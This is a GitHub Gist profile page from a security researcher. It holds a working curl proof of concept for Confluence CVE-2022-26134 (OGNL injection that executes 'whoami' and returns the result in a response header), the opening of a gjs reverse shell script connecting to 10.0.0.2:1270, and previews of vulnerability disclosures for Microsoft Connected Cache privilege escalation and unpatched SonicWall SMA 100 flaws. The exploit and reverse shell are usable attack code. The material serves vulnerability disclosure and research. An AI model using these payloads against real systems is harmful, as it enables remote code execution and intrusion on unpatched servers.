Skip to content

Instantly share code, notes, and snippets.

View jbaines-r7's full-sized avatar
🦞

Jake Baines jbaines-r7

🦞
296 followers · 9 following
View GitHub Profile
@jbaines-r7
jbaines-r7 / cve_2022_26134_curl.md
Created June 6, 2022 18:06
Confluence CVE-2022-26134 Curl PoC

The following curl proof of concept will exfiltrate an executed command on Confluence 7.18.0 and below. The command below executes whoami and will store it in the X-Cmd-Response HTTP header.

curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Example:

albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script
@jbaines-r7
jbaines-r7 / shell.js
Last active June 6, 2022 23:37
gjs Reverse Shell
// gjs shell.js
const Gio = imports.gi.Gio;
const GLib = imports.gi.GLib;
try {
let connection = (new Gio.SocketClient()).connect_to_host("10.0.0.2:1270", null, null);
let output = connection.get_output_stream();
let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
@jbaines-r7
jbaines-r7 / ms_cc_lpe.md
Last active April 25, 2022 00:10
Microsoft Connected Cache LPE

Microsoft Connected Cache Local Privilege Escalation

Summary

Tested Versions

  • Endpoint Configuration Manager version: 2103
  • Site version: 5.00.9049.1000
  • Connected Cache version: 1.5.4.1512 (?)
  • Site installed on Windows Server 2019 (10.0.17763.2366)
@jbaines-r7
jbaines-r7 / sonicwall_sma_100_0_day.md
Last active May 4, 2022 14:05
Sonicwall SMA 100 Series 0-day

The following issues are unpatched vulnerabilities in SonicWall's SMA 100 Series. Testing was done using SMA 500v using firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. Because these two versions are substantially different under the hood, not all of the issues affect both versions. As such, for each issue I'll call out specifically which versions are affected. Note that no testing was done on the 10.2.0.x version line.

Summary

Vector Auth Affected Component Vulnerability Vector
Remote Unauthenticated 10.2.1.1-19sv httpd Stack-based buffer overflow AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Remote Authenticated Both Multiple cgi Command injection AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Remote Unauthenticated 10.2.1.1-19sv sonicfiles File upload path traversal AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Remote Unauthenticated Both sonicfiles CPU exhaustion AV:N